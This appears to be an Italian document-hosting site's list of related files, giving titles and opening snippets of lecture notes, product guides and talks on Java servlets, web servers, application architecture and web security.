Servlet e JDBC. Servlet e Web Server. Servlet e Web Server. Servlet e Web Server. Richieste. Servlet. Servlet: e JDBC Programmazione in Rete e Laboratorio Matteo Baldoni Dipartimento di Informatica Universita` degli Studi di Torino C.so Svizzera, 185 I-10149 Torino e : estensioni del Java API permettono di scrivere

Dettagli

Server-side Programming: Java servlets Parte II

Server-side Programming: Java servlets Parte II Corso di Laurea Specialistica in Ingegneria Informatica Corso di Laurea Specialistica in Ingegneria delle Telecomunicazioni Corso di Reti di Applicazioni Telematiche a.a. 2009-2010 Server-side Programming:

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10 Soluzioni software di EDM "Electronic Document Management" Gestione dell archiviazione, indicizzazione, consultazione e modifica dei documenti elettronici. Un approccio innovativo basato su tecnologie

Dettagli

Tutorial web Application

Tutorial web Application Tutorial web Application Installazione della JDK: Java viene distribuito con la jdk e il jre acronimi di Java Development Kit e Java Runtime Environment rispettivamente. La jdk è l'ambiente di sviluppo

Dettagli

Implementazione di MVC. Gabriele Pellegrinetti

Implementazione di MVC. Gabriele Pellegrinetti Implementazione di MVC Gabriele Pellegrinetti 2 Come implementare il pattern Model View Controller con le tecnologie JSP, ASP e XML Implementazione del pattern MVC in Java (JSP Model 2) SUN è stato il

Dettagli

Mail: contatti@tc-group.it UNI EN ISO 9001:2008

Mail: contatti@tc-group.it UNI EN ISO 9001:2008 T.&C.Systems Group S.r.l. Sede Legale e Operativa: Tel. : 081 787 73 91 Cap. Soc. 50.000,00 i.v. Viale della Costituzione Isola G1 Fax : 081 750 29 03 C.F./P.iva: 07699310632 80143 Centro Direzionale (NA)

Dettagli

Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione

Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione Anti-spyware Anti-spam Antivirus Anti-phishing Filtro di contenuti e URL Best practice, preparazioni e istruzioni

Dettagli

Architetture Web I Server Web e gli Standard della Comunicazione

Architetture Web I Server Web e gli Standard della Comunicazione Architetture Web I Server Web e gli Standard della Comunicazione Alessandro Martinelli alessandro.martinelli@unipv.it 1 Aprile 2014 Architetture Web I Server Web e gli Standard della Comunicazione Il Server

Dettagli

SPIKE APPLICATION SECURITY: SICUREZZA DIRETTAMENTE ALL INTERNO DEL CICLO DI VITA DEL SOFTWARE

SPIKE APPLICATION SECURITY: SICUREZZA DIRETTAMENTE ALL INTERNO DEL CICLO DI VITA DEL SOFTWARE SPIKE APPLICATION SECURITY: SICUREZZA DIRETTAMENTE ALL INTERNO DEL CICLO DI VITA DEL SOFTWARE La sicurezza delle applicazioni web si sposta a un livello più complesso man mano che il Web 2.0 prende piede.

Dettagli

Tecnologia avanzata e project engineering al servizio della PA Sicurezza delle reti della PA, dei servizi pubblici e delle attività digitali degli impiegati pubblici FORUM PA Digital Security per la PA

Dettagli

Sommario. Introduzione Architettura Client-Server. Server Web Browser Web. Architettura a Due Livelli Architettura a Tre Livelli

Sommario. Introduzione Architettura Client-Server. Server Web Browser Web. Architettura a Due Livelli Architettura a Tre Livelli Sommario Introduzione Architettura Client-Server Architettura a Due Livelli Architettura a Tre Livelli Server Web Browser Web Introduzione La storia inizia nel 1989 Tim Berners-Lee al CERN, progetto WWW

Dettagli

Identity Access Management nel web 2.0

Identity Access Management nel web 2.0 Identity Access Management nel web 2.0 Single Sign On in applicazioni eterogenee Carlo Bonamico, NIS s.r.l. carlo.bonamico@nispro.it 1 Sommario Problematiche di autenticazione in infrastrutture IT complesse

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Architetture per le applicazioni web-based. Mario Cannataro

Architetture per le applicazioni web-based. Mario Cannataro Architetture per le applicazioni web-based Mario Cannataro 1 Sommario Internet e le applicazioni web-based Caratteristiche delle applicazioni web-based Soluzioni per l architettura three-tier Livello utente

Dettagli

Un sistema di identificazione basato su tecnologia RFID

Un sistema di identificazione basato su tecnologia RFID tesi di laurea Anno Accademico 2005/2006 relatore Ch.mo prof. Stefano Russo correlatore Ch.mo prof. Massimo Ficco candidato Alessandro Ciasullo Matr. 831/166 Obiettivo Progettazione ed implementazione

Dettagli

Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig

Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig Chiara Braghin chiara.braghin@unimi.it! Fingerprinting (1) Definizione generica: A fingerprint is defined as: 1. The impression

Dettagli

Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig. Chiara Braghin. chiara.braghin@unimi.it! Fingerprinting (1)

Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig. Chiara Braghin. chiara.braghin@unimi.it! Fingerprinting (1) Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig Chiara Braghin chiara.braghin@unimi.it! Fingerprinting (1) Definizione generica: A fingerprint is defined as: 1. The impression

Dettagli

KLEIS A.I. SECURITY SUITE

KLEIS A.I. SECURITY SUITE KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione

Dettagli

Quando si sa chiaramente come si deve comportare l applicazione si può analizzare una possibile soluzione applicativa.

Quando si sa chiaramente come si deve comportare l applicazione si può analizzare una possibile soluzione applicativa. Introduzione alla tecnologia JMX 1 Viene analizzata l architettura sottostante le Java Managment Extensions (JMX) mostrandone un utilizzo applicativo e analizzando altri possibili scenari d uso di Ivan

Dettagli

MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP. Link.it srl - Analisi Servizio IGRUE 1

MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP. Link.it srl - Analisi Servizio IGRUE 1 MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP Link.it srl - Analisi Servizio IGRUE 1 Panoramica L'attuale sistema IGRUE è composto da: Il

Dettagli

Alma Mater Studiorum Università di Bologna. Scuola di Ingegneria e Architettura. Tecnologie Web T. Esercitazione 10 - J2EE 25/05/2015

Alma Mater Studiorum Università di Bologna. Scuola di Ingegneria e Architettura. Tecnologie Web T. Esercitazione 10 - J2EE 25/05/2015 Web Container vs. EJB Container Alma Mater Studiorum Università di Bologna Scuola di Ingegneria e Architettura Tecnologie Web T - J2EE Home Page del corso: http://www-db.deis.unibo.it/courses/tw/ Versione

Dettagli

Malvertising: Il malware direttamente a casa tua! Giacomo Milani, CISSP Andrea Minigozzi, CISSP - OPST

Malvertising: Il malware direttamente a casa tua! Giacomo Milani, CISSP Andrea Minigozzi, CISSP - OPST Malvertising: Il malware direttamente a casa tua! Giacomo Milani, CISSP Andrea Minigozzi, CISSP - OPST Speaker: Giacomo Milani (giacomo83m) SecuritySummit15$ finger -info giacomo83m@gmail.com Giacomo Milani,

Dettagli

Il server web: Apache, IIS e PWS

Il server web: Apache, IIS e PWS IL SERVER WEB Corso WebGIS - Master in Sistemi Informativi Territoriali AA 2005/2006 ISTI- CNR c.renso@isti.cnr.it Il server web: Apache, IIS e PWS...1 Directory di default...2 Alias e cartelle virtuali...3

Dettagli

Web Server. Corso di Applicazioni Telematiche. A.A. 2006-07 Lezione n.5 Prof. Roberto Canonico

Web Server. Corso di Applicazioni Telematiche. A.A. 2006-07 Lezione n.5 Prof. Roberto Canonico Web Server Corso di Applicazioni Telematiche A.A. 2006-07 Lezione n.5 Prof. Roberto Canonico Università degli Studi di Napoli Federico II Facoltà di Ingegneria Web Server Per realizzare un sistema web

Dettagli

Sophos Deployment Packager guida per utenti. Versione prodotto: 1.2

Sophos Deployment Packager guida per utenti. Versione prodotto: 1.2 Sophos Deployment Packager guida per utenti Versione prodotto: 1.2 Data documento: settembre 2014 Sommario 1 Informazioni sulla guida...3 2 Deployment Packager...4 2.1 Problemi noti e limiti del Deployment

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Il monitoraggio remoto del radon: architettura software

Il monitoraggio remoto del radon: architettura software Il monitoraggio remoto del radon: architettura software Massimo Faure Ragani Sezione Agenti Fisici - Area Operativa Radioattività Ambientale Agenzia Regionale per la Protezione dell'ambiente della Valle

Dettagli